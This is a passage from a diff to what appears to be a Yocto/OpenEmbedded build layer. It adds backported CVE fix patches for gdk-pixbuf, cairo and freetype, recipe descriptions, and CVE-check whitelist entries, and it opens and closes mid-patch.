+--- a/lib/ephy-string.c
++++ b/lib/ephy-string.c
+@@ -114,11 +114,10 @@ ephy_string_shorten (char  *str,
+   /* create string */
+   bytes = GPOINTER_TO_UINT (g_utf8_offset_to_pointer (str, target_length - 1) - str);
+ 
+-  /* +1 for ellipsis, +1 for trailing NUL */
+-  new_str = g_new (gchar, bytes + 1 + 1);
++  new_str = g_new (gchar, bytes + strlen ("…") + 1);
+ 
+   strncpy (new_str, str, bytes);
+-  strcat (new_str, "…");
++  strncpy (new_str + bytes, "…", strlen ("…") + 1);
+ 
+   g_free (str);
+ 
+-- 
+GitLab
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch
new file mode 100644
index 0000000000..3fef2bc1eb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch
@@ -0,0 +1,55 @@
+From bdd3acbd48a575d418ba6bf1b32d7bda2fae1c81 Mon Sep 17 00:00:00 2001
+From: Robert Ancell <robert.ancell@canonical.com>
+Date: Mon, 30 Nov 2020 12:26:12 +1300
+Subject: [PATCH 02/13] gif: Fix LZW decoder accepting invalid LZW code.
+
+The code value after a reset wasn't being validated, which means we would
+accept invalid codes. This could cause an infinite loop in the decoder.
+
+Fixes CVE-2020-29385
+
+Fixes https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/164
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/bdd3acbd48a575d418ba6bf1b32d7bda2fae1c81]
+CVE: CVE-2020-29385
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gdk-pixbuf/lzw.c                    |  13 +++++++------
+ 1 files changed, 7 insertions(+), 6 deletions(-)
+ create mode 100644 tests/test-images/fail/hang_114.gif
+
+diff --git a/gdk-pixbuf/lzw.c b/gdk-pixbuf/lzw.c
+index 9e052a6f7..105daf2b1 100644
+--- a/gdk-pixbuf/lzw.c
++++ b/gdk-pixbuf/lzw.c
+@@ -195,19 +195,20 @@ lzw_decoder_feed (LZWDecoder *self,
+                                 if (self->last_code != self->clear_code && self->code_table_size < MAX_CODES) {
+                                         if (self->code < self->code_table_size)
+                                                 add_code (self, self->code);
+-                                        else if (self->code == self->code_table_size)
++                                        else
+                                                 add_code (self, self->last_code);
+-                                        else {
+-                                                /* Invalid code received - just stop here */
+-                                                self->last_code = self->eoi_code;
+-                                                return output_length;
+-                                        }
+ 
+                                         /* When table is full increase code size */
+                                         if (self->code_table_size == (1 << self->code_size) && self->code_size < LZW_CODE_MAX)
+                                                 self->code_size++;
+                                 }
+ 
++                                /* Invalid code received - just stop here */
++                                if (self->code >= self->code_table_size) {
++                                        self->last_code = self->eoi_code;
++                                        return output_length;
++                                }
++
+                                 /* Convert codeword into indexes */
+                                 n_written += write_indexes (self, output + n_written, output_length - n_written);
+                         }
+-- 
+2.25.1
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
new file mode 100644
index 0000000000..fe594b24bb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
@@ -0,0 +1,40 @@
+From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001
+From: Emmanuele Bassi <ebassi@gnome.org>
+Date: Wed, 1 Apr 2020 18:11:55 +0100
+Subject: [PATCH] Check the memset length argument
+
+Avoid overflows by using the checked multiplication macro for gsize.
+
+Fixes: #132
+
+Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]
+CVE: CVE-2021-20240
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index c9db3c66e..49674fd2e 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+ 
+         /* If no rendered frame, render the first frame */
+         if (anim->last_frame == NULL) {
++                gsize len = 0;
+                 if (anim->last_frame_data == NULL)
+                         anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height);
+                 if (anim->last_frame_data == NULL)
+                         return NULL;
+-                memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height);
++                if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height))
++                        memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len);
++                else
++                        return NULL;
+                 composite_frame (anim, g_list_nth_data (anim->frames, 0));
+         }
+ 
+-- 
+GitLab
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
new file mode 100644
index 0000000000..b29ab209ce
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
@@ -0,0 +1,61 @@
+From bdf3a2630c02a63803309cf0ad4b274234c814ce Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 9 Aug 2022 09:45:42 +0530
+Subject: [PATCH] CVE-2021-46829
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/5398f04d772f7f8baf5265715696ed88db0f0512]
+CVE: CVE-2021-46829
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index d742963..9544391 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -364,7 +364,7 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+         for (i = 0; i < n_indexes; i++) {
+                 guint8 index = index_buffer[i];
+                 guint x, y;
+-                int offset;
++                gsize offset;
+ 
+                 if (index == frame->transparent_index)
+                         continue;
+@@ -374,11 +374,13 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+                 if (x >= anim->width || y >= anim->height)
+                         continue;
+ 
+-                offset = y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + x * 4;
+-                pixels[offset + 0] = frame->color_map[index * 3 + 0];
+-                pixels[offset + 1] = frame->color_map[index * 3 + 1];
+-                pixels[offset + 2] = frame->color_map[index * 3 + 2];
+-                pixels[offset + 3] = 255;
++                if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++                    g_size_checked_add (&offset, offset, x * 4)) {
++                        pixels[offset + 0] = frame->color_map[index * 3 + 0];
++                        pixels[offset + 1] = frame->color_map[index * 3 + 1];
++                        pixels[offset + 2] = frame->color_map[index * 3 + 2];
++                        pixels[offset + 3] = 255;
++                }
+         }
+ 
+ out:
+@@ -443,8 +445,11 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+                         x_end = MIN (anim->last_frame->x_offset + anim->last_frame->width, anim->width);
+                         y_end = MIN (anim->last_frame->y_offset + anim->last_frame->height, anim->height);
+                         for (y = anim->last_frame->y_offset; y < y_end; y++) {
+-                                guchar *line = pixels + y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + anim->last_frame->x_offset * 4;
+-                                memset (line, 0, (x_end - anim->last_frame->x_offset) * 4);
++                                gsize offset;
++                                if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++                                    g_size_checked_add (&offset, offset, anim->last_frame->x_offset * 4)) {
++                                         memset (pixels + offset, 0, (x_end - anim->last_frame->x_offset) * 4);
++                                }
+                         }
+                         break;
+                 case GDK_PIXBUF_FRAME_REVERT:
+-- 
+2.25.1
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
index 0405fa78b5..1171e6cc11 100644
--- a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
@@ -24,6 +24,9 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \
            file://0004-Do-not-run-tests-when-building.patch \
            file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \
            file://missing-test-data.patch \
+           file://CVE-2020-29385.patch \
+           file://CVE-2021-20240.patch \
+           file://CVE-2021-46829.patch \
            "
 
 SRC_URI_append_class-target = " \
diff --git a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
index 3a2727b701..5503f225bb 100644
--- a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
+++ b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
@@ -1,4 +1,6 @@
 SUMMARY = "GTK+ icon theme"
+DESCRIPTION = "The Adwaita icon theme is the default icon theme of the GNOME desktop \
+This package package contains an icon theme for Gtk+ 3 applications."
 HOMEPAGE = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme"
 BUGTRACKER = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme/issues"
 SECTION = "x11/gnome"
diff --git a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
index 92b0d1d52f..0842f10ea9 100644
--- a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
+++ b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
@@ -102,7 +102,7 @@ EOF
         # from the target sysroot.
         cat > ${B}/g-ir-scanner-wrapper << EOF
 #!/bin/sh
-# This prevents g-ir-scanner from writing cache data to $HOME
+# This prevents g-ir-scanner from writing cache data to user's HOME dir
 export GI_SCANNER_DISABLE_CACHE=1
 
 g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@"
diff --git a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
index 0306b04f4e..6b59029255 100644
--- a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
+++ b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Library for sending desktop notifications to a notification daemon"
+DESCRIPTION = "It sends desktop notifications to a notification daemon, as defined \
+in the Desktop Notifications spec. These notifications can be used to inform \
+the user about an event or display some form of information without getting \
+in the user's way."
 HOMEPAGE = "https://gitlab.gnome.org/GNOME/libnotify"
 BUGTRACKER = "https://gitlab.gnome.org/GNOME/libnotify/issues"
 SECTION = "libs"
@@ -20,3 +24,6 @@ PROVIDES += "libnotify3"
 RPROVIDES_${PN} += "libnotify3"
 RCONFLICTS_${PN} += "libnotify3"
 RREPLACES_${PN} += "libnotify3"
+
+# -7381 is specific to the NodeJS bindings
+CVE_CHECK_WHITELIST += "CVE-2013-7381"
diff --git a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
index 237aec6062..ef1dae0a69 100644
--- a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
+++ b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
@@ -25,6 +25,9 @@ SRC_URI += "file://gtk-option.patch \
 
 SRC_URI[archive.sha256sum] = "f7628905f1cada84e87e2b14883ed57d8094dca3281d5bcb24ece4279e9a92ba"
 
+# Issue only on windows
+CVE_CHECK_WHITELIST += "CVE-2018-1000041"
+
 CACHED_CONFIGUREVARS = "ac_cv_path_GDK_PIXBUF_QUERYLOADERS=${STAGING_LIBDIR_NATIVE}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders"
 
 PACKAGECONFIG ??= "gdkpixbuf"
diff --git a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
index 72511af02d..8b5d301515 100644
--- a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
+++ b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
@@ -4,6 +4,7 @@ the freedesktop.org project, a cross-desktop effort to access passwords, \
 tokens and other types of secrets. libsecret provides a convenient wrapper \
 for these methods so consumers do not have to call the low-level DBus methods."
 LICENSE = "LGPLv2.1"
+HOMEPAGE = "https://github.com/GNOME/libsecret"
 BUGTRACKER = "https://gitlab.gnome.org/GNOME/libsecret/issues"
 LIC_FILES_CHKSUM = "file://COPYING;md5=23c2a5e0106b99d75238986559bb5fc6"
 
diff --git a/meta/recipes-graphics/builder/builder_0.1.bb b/meta/recipes-graphics/builder/builder_0.1.bb
index 0a64c31ab3..9d5cd8cde6 100644
--- a/meta/recipes-graphics/builder/builder_0.1.bb
+++ b/meta/recipes-graphics/builder/builder_0.1.bb
@@ -29,3 +29,5 @@ do_install () {
 	chown  builder.builder ${D}${sysconfdir}/mini_x/session.d/builder_session.sh
 }
 
+# -4178 is an unrelated 'builder'
+CVE_CHECK_WHITELIST = "CVE-2008-4178"
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
index 5232cf70c6..a2dba6cb20 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
@@ -1,19 +1,20 @@
-There is a potential infinite-loop in function _arc_error_normalized().
+There is an assertion in function _cairo_arc_in_direction().
 
 CVE: CVE-2019-6461
 Upstream-Status: Pending
 Signed-off-by: Ross Burton <ross.burton@intel.com>
 
 diff --git a/src/cairo-arc.c b/src/cairo-arc.c
-index 390397bae..f9249dbeb 100644
+index 390397bae..1bde774a4 100644
 --- a/src/cairo-arc.c
 +++ b/src/cairo-arc.c
-@@ -99,7 +99,7 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
-     do {
- 	angle = M_PI / i++;
- 	error = _arc_error_normalized (angle);
--    } while (error > tolerance);
-+    } while (error > tolerance && error > __DBL_EPSILON__);
+@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t	  *cr,
+     if (cairo_status (cr))
+         return;
  
-     return angle;
- }
+-    assert (angle_max >= angle_min);
++    if (angle_max < angle_min)
++       return;
+ 
+     if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
+ 	angle_max = fmod (angle_max - angle_min, 2 * M_PI);
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
index 4e4598c5b5..7c3209291b 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
@@ -1,20 +1,40 @@
-There is an assertion in function _cairo_arc_in_direction().
-
 CVE: CVE-2019-6462
-Upstream-Status: Pending
-Signed-off-by: Ross Burton <ross.burton@intel.com>
+Upstream-Status: Backport
+Signed-off-by: Quentin Schulz <quentin.schulz@theobroma-systems.com>
+
+From ab2c5ee21e5f3d3ee4b3f67cfcd5811a4f99c3a0 Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <hlewin@gmx.de>
+Date: Sun, 1 Aug 2021 11:16:03 +0000
+Subject: [PATCH] _arc_max_angle_for_tolerance_normalized: fix infinite loop
+
+---
+ src/cairo-arc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
 
 diff --git a/src/cairo-arc.c b/src/cairo-arc.c
-index 390397bae..1bde774a4 100644
+index 390397bae..1c891d1a0 100644
 --- a/src/cairo-arc.c
 +++ b/src/cairo-arc.c
-@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t	  *cr,
-     if (cairo_status (cr))
-         return;
+@@ -90,16 +90,18 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
+ 	{ M_PI / 11.0,  9.81410988043554039085e-09 },
+     };
+     int table_size = ARRAY_LENGTH (table);
++    const int max_segments = 1000; /* this value is chosen arbitrarily. this gives an error of about 1.74909e-20 */
  
--    assert (angle_max >= angle_min);
-+    if (angle_max < angle_min)
-+       return;
+     for (i = 0; i < table_size; i++)
+ 	if (table[i].error < tolerance)
+ 	    return table[i].angle;
  
-     if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
- 	angle_max = fmod (angle_max - angle_min, 2 * M_PI);
+     ++i;
++
+     do {
+ 	angle = M_PI / i++;
+ 	error = _arc_error_normalized (angle);
+-    } while (error > tolerance);
++    } while (error > tolerance && i < max_segments);
+ 
+     return angle;
+ }
+-- 
+2.38.1
+
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
new file mode 100644
index 0000000000..fb6ce5cfdf
--- /dev/null
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
@@ -0,0 +1,60 @@
+Fix stack buffer overflow.
+
+CVE: CVE-2020-35492
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 03a820b173ed1fdef6ff14b4468f5dbc02ff59be Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <heiko.lewin@worldiety.de>
+Date: Tue, 15 Dec 2020 16:48:19 +0100
+Subject: [PATCH] Fix mask usage in image-compositor
+
+---
+ src/cairo-image-compositor.c                |   8 ++--
+ test/Makefile.sources                       |   1 +
+ test/bug-image-compositor.c                 |  39 ++++++++++++++++++++
+ test/reference/bug-image-compositor.ref.png | Bin 0 -> 185 bytes
+ 4 files changed, 44 insertions(+), 4 deletions(-)
+ create mode 100644 test/bug-image-compositor.c
+ create mode 100644 test/reference/bug-image-compositor.ref.png
+
+diff --git a/src/cairo-image-compositor.c b/src/cairo-image-compositor.c
+index 79ad69f68..4f8aaed99 100644
+--- a/src/cairo-image-compositor.c
++++ b/src/cairo-image-compositor.c
+@@ -2601,14 +2601,14 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ 		    unsigned num_spans)
+ {
+     cairo_image_span_renderer_t *r = abstract_renderer;
+-    uint8_t *m;
++    uint8_t *m, *base = (uint8_t*)pixman_image_get_data(r->mask);
+     int x0;
+ 
+     if (num_spans == 0)
+ 	return CAIRO_STATUS_SUCCESS;
+ 
+     x0 = spans[0].x;
+-    m = r->_buf;
++    m = base;
+     do {
+ 	int len = spans[1].x - spans[0].x;
+ 	if (len >= r->u.composite.run_length && spans[0].coverage == 0xff) {
+@@ -2655,7 +2655,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ 				      spans[0].x, y,
+ 				      spans[1].x - spans[0].x, h);
+ 
+-	    m = r->_buf;
++	    m = base;
+ 	    x0 = spans[1].x;
+ 	} else if (spans[0].coverage == 0x0) {
+ 	    if (spans[0].x != x0) {
+@@ -2684,7 +2684,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ #endif
+ 	    }
+ 
+-	    m = r->_buf;
++	    m = base;
+ 	    x0 = spans[1].x;
+ 	} else {
+ 	    *m++ = spans[0].coverage;
+-- 
diff --git a/meta/recipes-graphics/cairo/cairo_1.16.0.bb b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
index 8663dec404..4827374ffc 100644
--- a/meta/recipes-graphics/cairo/cairo_1.16.0.bb
+++ b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
@@ -27,6 +27,7 @@ SRC_URI = "http://cairographics.org/releases/cairo-${PV}.tar.xz \
            file://CVE-2018-19876.patch \
            file://CVE-2019-6461.patch \
            file://CVE-2019-6462.patch \
+           file://CVE-2020-35492.patch \
           "
 
 SRC_URI[md5sum] = "f19e0353828269c22bd72e271243a552"
diff --git a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
index 7d9db1f38c..73315c97ec 100644
--- a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
@@ -1,5 +1,9 @@
 SUMMARY = "GStreamer integration library for Clutter"
+DESCRIPTION = "Clutter-Gst is an integration library for using GStreamer with Clutter. \
+It provides a GStreamer sink to upload frames to GL and an actor that \
+implements the ClutterGstPlayer interface using playbin."
 HOMEPAGE = "http://www.clutter-project.org/"
+BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter-gst/-/issues"
 LICENSE = "LGPLv2+"
 
 inherit clutter features_check upstream-version-is-even gobject-introspection
diff --git a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
index 7bf2278555..9a28b5219b 100644
--- a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
@@ -1,5 +1,10 @@
 SUMMARY = "Library for embedding a Clutter canvas in a GTK+ application"
+DESCRIPTION = "Clutter-GTK is a library providing facilities to integrate Clutter into GTK+ \
+applications and vice versa. It provides a GTK+ widget, GtkClutterEmbed, for embedding the \
+a Clutter stage into any GtkContainer; and GtkClutterActor, a Clutter \
+actor for embedding any GtkWidget inside a Clutter stage."
 HOMEPAGE = "http://www.clutter-project.org/"
+BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter/-/issues"
 LICENSE = "LGPLv2+"
 
 CLUTTERBASEBUILDCLASS = "meson"
diff --git a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
index fa8a29b798..31f9e32dc2 100644
--- a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
+++ b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
@@ -6,10 +6,13 @@ Subject: [PATCH] [sfnt] Fix heap buffer overflow (#59308).
 This is CVE-2020-15999.
 
 * src/sfnt/pngshim.c (Load_SBit_Png): Test bitmap size earlier.
+CVE: CVE-2020-15999
 
 Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a3bab162b2ae616074c8877a04556932998aeacd]
 
 Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
 ---
  src/sfnt/pngshim.c | 14 +++++++-------
  1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
new file mode 100644
index 0000000000..e66400ddb1
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
@@ -0,0 +1,33 @@
+From 53dfdcd8198d2b3201a23c4bad9190519ba918db Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Thu, 17 Mar 2022 19:24:16 +0100
+Subject: [PATCH] [sfnt] Avoid invalid face index.
+
+Fixes #1138.
+
+* src/sfnt/sfobjs.c (sfnt_init_face), src/sfnt/sfwoff2.c (woff2_open_font):
+Check `face_index` before decrementing.
+
+CVE: CVE-2022-27404
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/53dfdcd8198d2b3201a23c4bad9190519ba918db.patch]
+Comment: Removed second hunk as sfwoff2.c file is not part of current v2.10.1 code
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/sfnt/sfobjs.c  | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/sfnt/sfobjs.c b/src/sfnt/sfobjs.c
+index f9d4d3858..9771c35df 100644
+--- a/src/sfnt/sfobjs.c
++++ b/src/sfnt/sfobjs.c
+@@ -566,7 +566,7 @@
+     face_index = FT_ABS( face_instance_index ) & 0xFFFF;
+
+     /* value -(N+1) requests information on index N */
+-    if ( face_instance_index < 0 )
++    if ( face_instance_index < 0 && face_index > 0 )
+       face_index--;
+
+     if ( face_index >= face->ttc_header.count )
+-- 
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
new file mode 100644
index 0000000000..08fccd5a3b
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch
@@ -0,0 +1,38 @@
+From 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 06:40:17 +0100
+Subject: [PATCH] * src/base/ftobjs.c (ft_open_face_internal): Properly guard
+ `face_index`.
+We must ensure that the cast to `FT_Int` doesn't change the sign.
+Fixes #1139.
+
+CVE: CVE-2022-27405
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 2c0f0e6c9..10952a6c6 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -2527,6 +2527,15 @@
+ #endif
+ 
+ 
++    /* only use lower 31 bits together with sign bit */
++    if ( face_index > 0 )
++      face_index &= 0x7FFFFFFFL;
++    else
++    {
++      face_index &= 0x7FFFFFFFL;
++      face_index  = -face_index;
++    }
++
+ #ifdef FT_DEBUG_LEVEL_TRACE
+     FT_TRACE3(( "FT_Open_Face: " ));
+     if ( face_index < 0 )
+-- 
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
new file mode 100644
index 0000000000..4b5e629f30
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch
@@ -0,0 +1,31 @@
+From 0c2bdb01a2e1d24a3e592377a6d0822856e10df2 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Sat, 19 Mar 2022 09:37:28 +0100
+Subject: [PATCH] * src/base/ftobjs.c (FT_Request_Size): Guard `face->size`.
+
+Fixes #1140.
+
+CVE: CVE-2022-27406
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/0c2bdb01a2e1d24a3e592377a6d0822856e10df2]
+Comment: No Change in any hunk
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/base/ftobjs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/src/base/ftobjs.c b/src/base/ftobjs.c
+index 6492a1517..282c9121a 100644
+--- a/src/base/ftobjs.c
++++ b/src/base/ftobjs.c
+@@ -3409,6 +3409,9 @@
+     if ( !face )
+       return FT_THROW( Invalid_Face_Handle );
+ 
++    if ( !face->size )
++      return FT_THROW( Invalid_Size_Handle );
++
+     if ( !req || req->width < 0 || req->height < 0 ||
+          req->type >= FT_SIZE_REQUEST_TYPE_MAX )
+       return FT_THROW( Invalid_Argument );
+-- 
+GitLab
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
new file mode 100644
index 0000000000..800d77579e
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch
@@ -0,0 +1,40 @@
+From e6fda039ad638866b7a6a5d046f03278ba1b7611 Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Mon, 14 Nov 2022 19:18:19 +0100
+Subject: [PATCH] * src/truetype/ttgxvar.c (tt_hvadvance_adjust): Integer
+ overflow.
+
+Reported as
+
+  https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50462
+
+Upstream-Status: Backport [https://github.com/freetype/freetype/commit/e6fda039ad638866b7a6a5d046f03278ba1b7611]
+CVE: CVE-2023-2004
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/truetype/ttgxvar.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/src/truetype/ttgxvar.c b/src/truetype/ttgxvar.c
+index 78d87dc..258d701 100644
+--- a/src/truetype/ttgxvar.c
